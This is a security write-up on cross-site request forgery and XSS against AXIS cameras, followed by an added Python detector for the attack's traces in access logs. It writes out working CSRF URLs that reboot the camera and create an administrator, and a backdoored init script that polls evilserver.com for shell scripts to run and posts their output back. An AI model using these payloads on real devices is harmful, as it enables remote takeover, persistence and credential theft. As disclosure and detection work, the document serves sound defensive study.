Administrator CSRF to AXIS rootkit
The entire interface is vulnerable to cross-site request forgery (CSRF) attacks. As a result, if a person is logged in as administrator, and that person is viewing other web pages from the same browser, it is trivial to send commands to the camera that can do all sorts of things, such as:
- Reboot the camera: http://192.168.1.101/axis-cgi/admin/restart.cgi
- Add a new administrator:
http://192.168.1.101/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.shtml%3Fpageclose%3D1
However, what really makes this CSRF dangerous is that the filesystem of the AXIS camera is built around Linux and is customizable. In addition, the camera includes enough functionality to allow someone to install a back door via a CSRF/XSS attack. Let's look at how this would work.
The attacker would have to convince the victim either to view a website he controls or to click on a URL that was sent via IM or email. At this point, the XSS/CSRF attack begins by loading a few pages from the attacker's server in hidden IFRAMEs using something like the following:
http://192.168.1.101/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe src=http://www.evilserver.com/wifi/axisrb.htm><!--
This loads a CSRF attack that then submits the following POST to the camera's interface at /admin-bin/editcgi.cgi?file=/etc/init.d/httpd. Note that we are editing the httpd init script, which is executed each time the camera boots, and that the payload is delivered through a second XSS-vulnerable script. The following is the updated httpd file:
#! /bin/sh
echo "sleep 120" > /tmp/bd
echo "while true" >> /tmp/bd
echo "do" >> /tmp/bd
echo "shttpclient -o /tmp/todo http://evilserver.com/wifi/todo" >> /tmp/bd
echo "chmod 777 /tmp/todo" >> /tmp/bd
echo "/tmp/todo" >> /tmp/bd
echo "RESULTS=\`cat /tmp/results2\`" >> /tmp/bd
echo "shttpclient -o /tmp/output.txt http://evilserver.com/wifi/getresults.php?results=\$RESULTS" >> /tmp/bd
echo "sleep 60" >> /tmp/bd
echo "done" >> /tmp/bd
chmod 777 /tmp/bd
/tmp/bd&

. /etc/init.d/functions.sh
. /etc/conf.d/httpd

case "$1" in
  start)
    begin "Starting web server"
    start_daemon /bin/boa $BOA_OPTIONS
    end $?
    ;;
  stop)
    begin "Stopping web server"
    stop_daemon /bin/boa
    end $?
    ;;
  restart)
    begin "Restarting web server"
    stop_daemon /bin/boa
    start_daemon /bin/boa $BOA_OPTIONS
    end $?
    ;;
  *)
    error "Usage: $0 start|stop|restart"
    ;;
esac
We added a few lines at the beginning of the file that create a file called bd in the /tmp directory of the camera. This bd (backdoor) file is then made executable and launched. It starts a loop that uses a built-in program called shttpclient to check evilserver.com for a new todo file containing shell script to be executed. If the todo script is set up to write its output to a results file, the bd script posts that content back to the Internet.
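From the defender's side, the attack above leaves a recognisable trace in the camera's web server access log: state-changing admin CGIs requested with a Referer from a foreign origin (the hidden IFRAME's parent page), or with no Referer at all, plus markup in the query string of restartMessage.shtml. The following detector is an added example, not code from the original write-up or from AXIS; it assumes the camera logs in Combined Log Format and runs over constructed sample lines.

```python
import re
from urllib.parse import urlsplit

# Constructed access-log lines (Combined Log Format) for a camera reached at
# http://192.168.1.101; these are made-up entries, not real captures.
SAMPLE_LOG = """\
192.168.1.50 - root [12/Mar/2008:10:01:02 +0000] "GET /admin/users_set.shtml HTTP/1.1" 200 1532 "http://192.168.1.101/admin/index.shtml" "Mozilla/5.0"
192.168.1.50 - root [12/Mar/2008:10:03:11 +0000] "GET /axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1 HTTP/1.1" 200 210 "http://www.evilserver.com/wifi/axisbd.php" "Mozilla/5.0"
192.168.1.50 - root [12/Mar/2008:10:03:12 +0000] "GET /admin/restartMessage.shtml?server=%3Ciframe%20src%3Dhttp://www.evilserver.com/wifi/axisrb.htm%3E HTTP/1.1" 200 400 "-" "Mozilla/5.0"
192.168.1.50 - root [12/Mar/2008:10:03:13 +0000] "POST /admin-bin/editcgi.cgi?file=/etc/init.d/httpd HTTP/1.1" 200 88 "-" "Mozilla/5.0"
192.168.1.50 - root [12/Mar/2008:10:20:00 +0000] "GET /axis-cgi/admin/restart.cgi HTTP/1.1" 200 50 "http://192.168.1.101/admin/maintenance.shtml" "Mozilla/5.0"
"""

# State-changing admin endpoints named in the write-up; a browser hitting these
# from a foreign page (or with no Referer at all) is the CSRF pattern to triage.
STATE_CHANGING = {"/axis-cgi/admin/restart.cgi", "/axis-cgi/admin/pwdgrp.cgi", "/admin-bin/editcgi.cgi"}

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
                    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

def parse_line(line):
    m = LOG_RE.match(line)  # None for lines that are not in Combined Log Format
    return m.groupdict() if m else None

def classify(entry, camera_origin):
    """Finding labels for one parsed request (empty list means nothing notable)."""
    url = urlsplit(entry["target"])
    findings = []
    if url.path in STATE_CHANGING:
        ref = entry["referer"]
        if ref in ("", "-"):
            # Privacy settings also strip Referer: a triage signal, not proof of CSRF.
            findings.append("admin-cgi-no-referer")
        elif f"{urlsplit(ref).scheme}://{urlsplit(ref).netloc}" != camera_origin:
            findings.append("admin-cgi-cross-origin-referer")
    # A raw or percent-encoded '<' in the query string is the reflected-XSS vector
    if re.search(r"(?i)<|%3c", url.query):
        findings.append("markup-in-query")
    return findings

def scan(log_text, camera_origin="http://192.168.1.101"):
    """Return (request-target, findings) for every line that raised a finding."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        findings = classify(entry, camera_origin) if entry else []
        if findings:
            alerts.append((entry["target"], findings))
    return alerts
```

Pairing these alerts with an integrity check of /etc/init.d/httpd against a known-good copy catches the persistence step even when the log has been rotated.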
In other words, your AXIS camera can be rooted and remotely controlled by someone outside your network. Just imagine what can be done (and much more):
- Ping scan your internal network
- Grab banners using an existing copy of Netcat on the camera
- Send http requests to internal web servers and systematically hack them
- Grab the /etc/passwd file of the camera and post it
- Steal the wireless WEP or WPA password that is stored as plaintext in the configuration file
And much more...